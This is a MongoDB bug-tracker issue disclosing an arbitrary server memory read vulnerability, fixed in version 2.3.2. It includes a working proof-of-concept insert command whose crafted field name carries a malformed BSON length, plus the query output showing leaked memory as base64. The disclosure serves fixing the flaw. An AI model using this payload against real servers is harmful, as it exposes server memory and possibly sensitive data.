Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-7769

use --objcheck by default, Server arbitrary memory reading

    XMLWordPrintableJSON

Details

    • Icon: Bug Bug
    • Resolution: Done
    • Icon: Major - P3 Major - P3
    • 2.3.2
    • None
    • None
    • None
    • ALL

    Description

      The specialists of the Positive Research center have detected "Server arbitrary memory reading" vulnerability in MongoDB application.

      Cause of incorrect execution of BSON-document length in column name in the insert command it’s possible to insert a record which can contain a base64-encrypted server memory chunks.

      Example of use:

      Suppose you have a table "dropme" with write permission.

      Execute the following command with a result:

      > db.dropme.insert(

      {"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"}

      )
      > db.dropme.find()

      { "_id" : ObjectId("50857a4663944834b98eb4cc"), "" : null, "hello" : BinData(0,"d29ybGQAAAAACREAAAAQ/4wJSCCPCeyFjQkRAAAAAAAAAAAAWbcQAAAAMQAAAAEAAABgcicICAAAAAcAAACgKo0JABw5NAMAAAAAAAAAAAAAAMQ3jAlmAGkAQQAAAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsACIAYgAzAEoAcwBaAEEAQQBBAEEAQQBBAD0AIgApAAAAdABSAFEAAAAiAGgAZQBsAGwAbwAiACAAOgAgAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsAC...........................ACkALAAgACIAFg==") }

      After base64-code decryption you can get bytes from random server memory chunks.

      Credits

      The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)

      Attachments

        Activity

          People

            eliot Eliot Horowitz (Inactive)
            ymaryshev Yury
            Votes:
            1 Vote for this issue
            Watchers:
            12 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved: